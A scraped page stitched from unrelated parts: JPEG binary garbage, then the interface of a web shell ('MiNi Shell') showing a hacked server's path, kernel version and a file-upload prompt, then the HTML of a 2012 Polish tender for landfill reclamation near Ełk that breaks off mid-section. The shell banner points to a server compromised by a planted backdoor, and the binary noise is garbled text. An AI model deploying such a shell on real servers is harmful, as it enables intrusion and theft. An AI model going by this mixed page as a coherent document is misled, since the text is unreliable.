JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120327/70541-N-2012.html

<p class="kh_header"><b>Ełk: Rekultywacja składowisk odpadów na terenie Związku Międzygminnego
Gospodarka Komunalna</b><br>
<b>Numer ogłoszenia: 70541 - 2012; data zamieszczenia: 27.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Międzygminny "Gospodarka Komunalna" , ul. Marsz. J. Piłsudskiego 2, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 87 621 78 18, faks 87 621 78 17.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://elk-ekomazury.bip-wm.pl/public/?id=84817</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: związek międzygminny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rekultywacja składowisk odpadów na terenie Związku Międzygminnego
Gospodarka Komunalna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest rekultywacja składowisk odpadów na terenie Związku Międzygminnego Gospodarka Komunalna z podziałem na 5 części tj.:

1.1. Część I - Rekultywacja składowiska odpadów komunalnych w m. Niedźwiedzkie gm. Wieliczki.
1.1.1. Wykonanie rekultywacji technicznej:
a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na składowisku odpadów, uwzględniając osiadanie złoża odpadów, ze spadkami od 1,0 do 3,7 % na zewnątrz w kierunku skarp.
b) wykonanie odgazowania składowiska,
         c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy glebotwórczej z humusu, piasku próchnicznego lub kompostu,
1.1.2. Wykonanie rekultywacji biologicznej:
             Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska poprzez zabieg zadarniania.
1.1.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a) brodzika dezynfekcyjnego wykonanego z żelbetu,
          b) tablicy informacyjnej o konstrukcji metalowej,
          c) ogrodzenia siatki na słupach betonowych,
          d) 2 bram wjazdowych o konstrukcji metalowej,
          e) słupy żelbetowe po starej oczyszczalni,
          f) obwałowań ze starej oczyszczalni ścieków,
          g) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.
1.1.4.Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
1.1.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8a. do SIWZ oraz decyzje Starosty, w tym zmieniające. 

1.2. Część II - Rekultywacja składowiska odpadów komunalnych w m. Stare Juchy gm. Stare Juchy.
1.2.1. Wykonanie rekultywacji technicznej:
    a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku odpadów,  uwzględniając osiadanie złoża odpadów, ze spadkiem 2,5 % na zewnątrz.
    b)  wykonanie odgazowania składowiska, 
    c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm    warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu,
   d)   wykonanie 3 stałych piezometrów o głębokości 28,0 m każdy.
1.2.2.  Wykonanie rekultywacji biologicznej:
             Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska poprzez zabieg zadarniania.
1.2.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a)  tablicy informacyjnej o konstrukcji metalowej,
          b)  bramy wjazdowej o konstrukcji metalowej,
          c)  kontenerów na surowce wtórne,
          d) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za granicą terenu składowiska.
1.2.4.Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
 1.2.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8b. do SIWZ oraz decyzje Starosty, w tym zmieniające. Jednocześnie zamawiający informuje, iż do wyceny oferty nie należy ujmować rozbiórki wskazanego w dokumentacji technicznej budynku gospodarczego.


 1.3. Część III - Rekultywacja składowiska odpadów komunalnych w m. Stożne gm. Kowale Oleckie
 1.3.1. Wykonanie rekultywacji technicznej:
          a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku    odpadów,  uwzględniając osiadanie złoża odpadów, ze spadkiem 0,5% do 5% na zewnątrz w kierunku południowo - wschodnim,
          b) wykonanie odgazowania składowiska,
          c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu,
1.3.2. Wykonanie rekultywacji biologicznej:
             Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska  poprzez zabieg zadarniania.
1.3.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a) tablicy informacyjnej o konstrukcji metalowej,
          b) budynku gospodarczego,
          c) ogrodzenia z siatki na słupach stalowych,
          d) brama wjazdowa o konstrukcji metalowej,
          e) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.
1.3.4. Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
1.3.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8c. do SIWZ oraz decyzje Starosty, w tym zmieniające.

1.4. Część IV - Rekultywacja składowiska odpadów komunalnych w m. Świętajno gm. Świętajno.
1.4.1. Wykonanie rekultywacji technicznej:
a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku    odpadów,  uwzględniając osiadanie złoża odpadów, ze spadkiem 2, 5 % na zewnątrz w kierunku północno-wschodnim,
b) wykonanie odgazowania składowiska,
c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu, 
1.4.2. Wykonanie rekultywacji biologicznej:
Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska  poprzez zabieg zadarniania.
1.4.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a) brodzika dezynfekcyjnego,
         b) tablicy informacyjnej o konstrukcji metalowej,
         c) ogrodzenia z siatki na słupach betonowych,
         d) bramy wjazdowej o konstrukcji metalowej o długości 4 m,
         e) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.

1.4.4.Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.

1.4.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8d do SIWZ oraz decyzje Starosty, w tym zmieniające.

1.5.  Część V - Rekultywacja składowiska odpadów komunalnych w m. Wiśniowo Ełckie gm. Prostki.
1.5.1. Wykonanie rekultywacji technicznej:
a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku    odpadów, uwzględniając osiadanie złoża odpadów, ze spadkiem 2, 5 % na zewnątrz w kierunku północno-wschodnim,
b) wykonanie odgazowania składowiska,
c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu, 
1.5.2. Wykonanie rekultywacji biologicznej:
Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska  poprzez zabieg zadarniania.
1.5.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska: 
a) tablicy informacyjnej o konstrukcji metalowej;
b) ogrodzenia z siatki na słupach stalowych;
c) dwie bramy wjazdowe o konstrukcji metalowej o długości 4 m;
d) 4 boksów murowanych z cegły w tym jeden zadaszony (blacha falista na konstrukcji stalowej)
e) oświetlenie terenu składowiska.
       
          oraz: 
         a) budynek gospodarczy należy przenieść w miejsce wskazane przez Zarządcę składowiskiem, 
         b) trylinkę z rozbiórki nawierzchni wywieźć w miejsce wskazane przez Zarządzającego,
         c) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.

1.5.4. Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
1.5.5.Szczegółowy zakres prac określa projekt dokumentacja techniczna stanowiąca      załącznik nr 8e. do SIWZ oraz decyzje Starosty, w tym zmieniające.

2. Informacje ogólne dotyczące wszystkich części:
Załączone do SIWZ przedmiary nie stanowią podstawy późniejszego  rozliczenia umowy - umowa jest ryczałtowa tj. jej cena nie ulega zmianie w trakcie realizacji zadania. 
W cenie oferty należy uwzględnić koszty wykonania inwentaryzacji powykonawczej oraz inwentaryzacji  roboczej (wykonanej przez uprawnionego geodetę) po wykonaniu każdej z warstw rekultywacji, wykonania ewentualnych robót, które nie zostały ujęte w przedmiarze, a które należy wykonać zgodnie z dokumentacją techniczną, decyzjami Starosty - w tym decyzjami zmieniającymi - opisem przedmiotu zamówienia zawartym w SIWZ oraz na podstawie przeprowadzonej wizji lokalnej w miejscu planowanych robót. Każdy z oferentów winien odwiedzić miejsce wykonywania robót celem sprawdzenia warunków związanych z wykonywaniem prac będących przedmiotem przetargu oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia w załączonym przedmiarze robót elementów niezbędnych do wykonania umowy, a wynikających z załączonej dokumentacji. Proces zakrzewienia terenów podlegających rekultywacji  następować będzie samoczynnie, roślinnością pochodzącą z otoczenia i zamawiający nie wymaga dodatkowego zakrzewiania przez wykonawcę. 
Wykonawca wyłoniony w ramach każdej z części niniejszego postępowania zobowiązany będzie do przedłożenia Zamawiającemu, przed podpisaniem umowy, kosztorysu ofertowego  oraz kopii opłaconej polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej:
a)	dla części I - 120 tys. zł
b)	dla części II - 90 tys. zł
c)	dla części III - 260 tys. zł
d)	dla części IV - 435 tys. zł
e)	dla części V - 290 tys. zł 
3. Okres gwarancji (dla każdej części oddzielnie)  - 36 miesięcy od daty odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.30-7, 45.22.21.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Część I -Rekultywacja składowiska odpadów komunalnych w m. Niedźwiedzkie gm. Wieliczki. Wykonawca musi wykazać się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeśli okres działalności jest krótszy, w tym okresie),  co najmniej dwóch ziemnych robót budowlanych polegających na wykonaniu nasypu/nasypów o wartości nie mniejszej niż 90 000,00 PLN brutto (każda z nich). 
    Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.

2. Część II - Rekultywacja składowiska odpadów komunalnych w m. Stare Juchy gm. Stare Juchy. Wykonawca musi wykazać się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeśli okres działalności jest krótszy, w tym okresie),  co najmniej dwóch ziemnych robót budowlanych polegających na wykonaniu nasypu/nasypów o wartości nie mniejszej niż 70 000,00 PLN brutto (każda z nich). 
    Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.

3. Część III -Rekultywacja składowiska odpadów komunalnych w m. Stożne gm. Kowale Oleckie. Wykonawca musi wykazać się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeśli okres działalności jest krótszy, w tym okresie),  co najmniej dwóch ziemnych robót budowlanych polegających na wykonaniu nasypu/nasypów o wartości nie mniejszej niż 200 000,00 PLN brutto (każda z nich). 
    Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.

4. Część IV - Rekultywacja składowiska odpadów komunalnych w m. Świętajno gm. Świętajno. Wykonawca musi wykazać się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeśli okres działalności jest krótszy, w tym okresie),  co najmniej dwóch ziemnych robót budowlanych polegających na wykonaniu nasypu/nasypów o wartości nie mniejszej niż 300 000,00 PLN brutto (każda z nich). 
    Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.

5. Część V - Rekultywacja składowiska odpadów komunalnych w m. Wiśniowo Ełckie gm. Prostki. Wykonawca musi wykazać się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeśli okres działalności jest krótszy, w tym okresie),  co najmniej dwóch ziemnych robót budowlanych polegających na wykonaniu nasypu/nasypów o wartości nie mniejszej niż 220 000,00 PLN brutto (każda z nich). 
    Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.

Uwaga! Jeżeli robota budowlana wskazana przez wykonawcę dla jednej części spełnia warunki szczegółowe również dla innych części, wykonawca może wykazać się jej wykonaniem również w odniesieniu do tych części - o ile składa na nie ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uwaga ! Warunek taki sam dla każdej części:
Wykonawca musi posiadać do dyspozycji odpowiednio wykwalifikowany personel w tym: 
- osobę o uprawnieniach kierownika robót budowlanych. 
Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.

	Uwaga! Jeżeli wykaz osób posiadanych do dyspozycji przez wykonawcę, przedstawiony jako potwierdzenie na posiadanie osób zdolnych do wykonania zamówienia dla jednej części a z jego treści wynika również spełnianie warunków szczegółowych określonych dla innych części, wykonawca może posłużyć się tym wykazem również w odniesieniu do tych części - o ile składa na nie ofertę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Część I -Rekultywacja składowiska odpadów komunalnych w m. Niedźwiedzkie gm. Wieliczki. Wykonawca musi wykazać się posiadaniem środków finansowych lub zdolności kredytowej w wysokości min. 90 000,00 PLN.
    Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia
2. Część II - Rekultywacja składowiska odpadów komunalnych w m. Stare Juchy gm. Stare Juchy. Wykonawca musi wykazać się posiadaniem środków finansowych lub zdolności kredytowej w wysokości min. 70 000,00 PLN.
Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia
3. Część III -Rekultywacja składowiska odpadów komunalnych w m. Stożne gm. Kowale Oleckie. Wykonawca musi wykazać się posiadaniem środków finansowych lub zdolności kredytowej w wysokości min. 200 000,00 PLN.
Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia
4. Część IV - Rekultywacja składowiska odpadów komunalnych w m. Świętajno gm. Świętajno. Wykonawca musi wykazać się posiadaniem środków finansowych lub zdolności kredytowej w wysokości min. 300 000,00 PLN.
Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia
5. Część V - Rekultywacja składowiska odpadów komunalnych w m. Wiśniowo Ełckie gm. Prostki. Wykonawca musi wykazać się posiadaniem środków finansowych lub zdolności kredytowej w wysokości min. 220 000,00 PLN.
    Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia
   	
Uwaga! Poniższe dotyczy każdej części.
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.

	Uwaga! Jeżeli wykonawca przedstawi informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej w których posiada rachunek, potwierdzającą żądaną wysokość posiadanych środków finansowych lub żądaną zdolność kredytową wykonawcy w stosunku do jednej części, a z informacji tej wynika spełnianie warunków szczegółowych również dla innych części, wykonawca może posłużyć się ta informacja również w odniesieniu do tych części - o ile składa na nie ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
